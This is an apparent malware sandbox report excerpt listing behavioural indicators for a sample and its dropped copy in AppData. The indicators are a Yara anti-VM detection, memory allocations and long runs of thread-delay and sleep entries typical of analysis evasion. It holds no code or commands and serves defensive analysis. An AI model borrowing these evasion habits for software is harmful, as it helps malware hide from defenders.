Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: file.exe PID: 7544, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rXcourOVPD.exe PID: 6576, type: MEMORYSTR

Source: C:\Users\user\Desktop\file.exe	Memory allocated: 2470000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: 26E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: 24F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: 8A10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: 73F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: 9A10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: AA10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: 2B90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: 2D40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: 4D40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Memory allocated: 28B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Memory allocated: 2AF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Memory allocated: 2930000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Memory allocated: 8770000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Memory allocated: 9770000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Memory allocated: 9960000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Memory allocated: A960000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Memory allocated: E00000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Memory allocated: 2A90000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Memory allocated: 28A0000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 599546	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 599217	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 599099	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 598968	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 598847	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 598718	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 598609	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 598500	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 598390	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 598281	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 598171	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 598062	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 597953	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 597843	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 597734	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 597625	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 597515	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 597405	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 597296	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 597187	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 597078	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 596968	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 596859	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 596749	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 596640	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 596531	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 596421	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 596312	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 596203	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 596093	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 595984	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 595875	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 595765	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 595656	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 595546	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 595437	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 595326	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 595218	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 595109	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 594988	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 594859	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 594749	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 594640	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 594531	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Thread delayed: delay time: 599875
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Thread delayed: delay time: 599765
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Thread delayed: delay time: 599656
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Thread delayed: delay time: 599547
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Thread delayed: delay time: 599433
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Thread delayed: delay time: 599328
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Thread delayed: delay time: 599218
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Thread delayed: delay time: 599108
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Thread delayed: delay time: 599000
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Thread delayed: delay time: 598890
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Thread delayed: delay time: 598777
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Thread delayed: delay time: 598671
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Thread delayed: delay time: 598561
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Thread delayed: delay time: 598452
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Thread delayed: delay time: 598343
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Thread delayed: delay time: 598234
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Thread delayed: delay time: 598124
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Thread delayed: delay time: 598015
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Thread delayed: delay time: 597906
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Thread delayed: delay time: 597797
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Thread delayed: delay time: 597687
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Thread delayed: delay time: 597578
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Thread delayed: delay time: 597468
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Thread delayed: delay time: 597357
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Thread delayed: delay time: 597250
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Thread delayed: delay time: 597140
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Thread delayed: delay time: 597027
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Thread delayed: delay time: 596922
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Thread delayed: delay time: 596806
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Thread delayed: delay time: 596687
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Thread delayed: delay time: 596578
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Thread delayed: delay time: 596468
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Thread delayed: delay time: 596359
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Thread delayed: delay time: 596250
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Thread delayed: delay time: 596140
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Thread delayed: delay time: 596014
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Thread delayed: delay time: 595906
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Thread delayed: delay time: 595796
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Thread delayed: delay time: 595687
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Thread delayed: delay time: 595578
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Thread delayed: delay time: 595468
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Thread delayed: delay time: 595359
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Thread delayed: delay time: 595250
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Thread delayed: delay time: 595140
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Thread delayed: delay time: 595028
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Thread delayed: delay time: 594922
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Thread delayed: delay time: 594812
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Thread delayed: delay time: 594703
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Thread delayed: delay time: 594593

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6200	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3596	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8230	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1077	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window / User API: threadDelayed 1868	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window / User API: threadDelayed 7988	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Window / User API: threadDelayed 8284
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Window / User API: threadDelayed 1583

Source: C:\Users\user\Desktop\file.exe TID: 7592	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7920	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6572	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8116	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 3308	Thread sleep count: 31 > 30	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 3308	Thread sleep time: -28592453314249787s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 3308	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 3308	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7820	Thread sleep count: 1868 > 30	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7820	Thread sleep count: 7988 > 30	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 3308	Thread sleep time: -599765s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 3308	Thread sleep time: -599656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 3308	Thread sleep time: -599546s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 3308	Thread sleep time: -599437s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 3308	Thread sleep time: -599328s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 3308	Thread sleep time: -599217s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 3308	Thread sleep time: -599099s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 3308	Thread sleep time: -598968s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 3308	Thread sleep time: -598847s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 3308	Thread sleep time: -598718s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 3308	Thread sleep time: -598609s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 3308	Thread sleep time: -598500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 3308	Thread sleep time: -598390s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 3308	Thread sleep time: -598281s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 3308	Thread sleep time: -598171s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 3308	Thread sleep time: -598062s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 3308	Thread sleep time: -597953s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 3308	Thread sleep time: -597843s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 3308	Thread sleep time: -597734s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 3308	Thread sleep time: -597625s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 3308	Thread sleep time: -597515s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 3308	Thread sleep time: -597405s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 3308	Thread sleep time: -597296s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 3308	Thread sleep time: -597187s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 3308	Thread sleep time: -597078s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 3308	Thread sleep time: -596968s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 3308	Thread sleep time: -596859s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 3308	Thread sleep time: -596749s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 3308	Thread sleep time: -596640s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 3308	Thread sleep time: -596531s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 3308	Thread sleep time: -596421s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 3308	Thread sleep time: -596312s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 3308	Thread sleep time: -596203s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 3308	Thread sleep time: -596093s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 3308	Thread sleep time: -595984s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 3308	Thread sleep time: -595875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 3308	Thread sleep time: -595765s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 3308	Thread sleep time: -595656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 3308	Thread sleep time: -595546s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 3308	Thread sleep time: -595437s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 3308	Thread sleep time: -595326s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 3308	Thread sleep time: -595218s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 3308	Thread sleep time: -595109s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 3308	Thread sleep time: -594988s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 3308	Thread sleep time: -594859s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 3308	Thread sleep time: -594749s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 3308	Thread sleep time: -594640s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 3308	Thread sleep time: -594531s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe TID: 7156	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe TID: 7844	Thread sleep time: -23980767295822402s >= -30000s
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe TID: 7844	Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe TID: 7844	Thread sleep time: -599875s >= -30000s
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe TID: 7848	Thread sleep count: 8284 > 30
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe TID: 7848	Thread sleep count: 1583 > 30
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe TID: 7844	Thread sleep time: -599765s >= -30000s
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe TID: 7844	Thread sleep time: -599656s >= -30000s
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe TID: 7844	Thread sleep time: -599547s >= -30000s
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe TID: 7844	Thread sleep time: -599433s >= -30000s
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe TID: 7844	Thread sleep time: -599328s >= -30000s
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe TID: 7844	Thread sleep time: -599218s >= -30000s
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe TID: 7844	Thread sleep time: -599108s >= -30000s
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe TID: 7844	Thread sleep time: -599000s >= -30000s
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe TID: 7844	Thread sleep time: -598890s >= -30000s
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe TID: 7844	Thread sleep time: -598777s >= -30000s
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe TID: 7844	Thread sleep time: -598671s >= -30000s
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe TID: 7844	Thread sleep time: -598561s >= -30000s
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe TID: 7844	Thread sleep time: -598452s >= -30000s
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe TID: 7844	Thread sleep time: -598343s >= -30000s
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe TID: 7844	Thread sleep time: -598234s >= -30000s
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe TID: 7844	Thread sleep time: -598124s >= -30000s
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe TID: 7844	Thread sleep time: -598015s >= -30000s
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe TID: 7844	Thread sleep time: -597906s >= -30000s
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe TID: 7844	Thread sleep time: -597797s >= -30000s
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe TID: 7844	Thread sleep time: -597687s >= -30000s
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe TID: 7844	Thread sleep time: -597578s >= -30000s
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe TID: 7844	Thread sleep time: -597468s >= -30000s
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe TID: 7844	Thread sleep time: -597357s >= -30000s
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe TID: 7844	Thread sleep time: -597250s >= -30000s
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe TID: 7844	Thread sleep time: -597140s >= -30000s
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe TID: 7844	Thread sleep time: -597027s >= -30000s
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe TID: 7844	Thread sleep time: -596922s >= -30000s
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe TID: 7844	Thread sleep time: -596806s >= -30000s
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe TID: 7844	Thread sleep time: -596687s >= -30000s
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe TID: 7844	Thread sleep time: -596578s >= -30000s
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe TID: 7844	Thread sleep time: -596468s >= -30000s
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe TID: 7844	Thread sleep time: -596359s >= -30000s
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe TID: 7844	Thread sleep time: -596250s >= -30000s
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe TID: 7844	Thread sleep time: -596140s >= -30000s
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe TID: 7844	Thread sleep time: -596014s >= -30000s
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe TID: 7844	Thread sleep time: -595906s >= -30000s
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe TID: 7844	Thread sleep time: -595796s >= -30000s
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe TID: 7844	Thread sleep time: -595687s >= -30000s
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe TID: 7844	Thread sleep time: -595578s >= -30000s
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe TID: 7844	Thread sleep time: -595468s >= -30000s
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe TID: 7844	Thread sleep time: -595359s >= -30000s
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe TID: 7844	Thread sleep time: -595250s >= -30000s
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe TID: 7844	Thread sleep time: -595140s >= -30000s
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe TID: 7844	Thread sleep time: -595028s >= -30000s
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe TID: 7844	Thread sleep time: -594922s >= -30000s
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe TID: 7844	Thread sleep time: -594812s >= -30000s
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe TID: 7844	Thread sleep time: -594703s >= -30000s
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe TID: 7844	Thread sleep time: -594593s >= -30000s

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 599546	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 599217	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 599099	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 598968	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 598847	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 598718	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 598609	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 598500	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 598390	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 598281	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 598171	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 598062	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 597953	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 597843	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 597734	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 597625	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 597515	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 597405	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 597296	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 597187	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 597078	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 596968	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 596859	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 596749	Jump to behavior
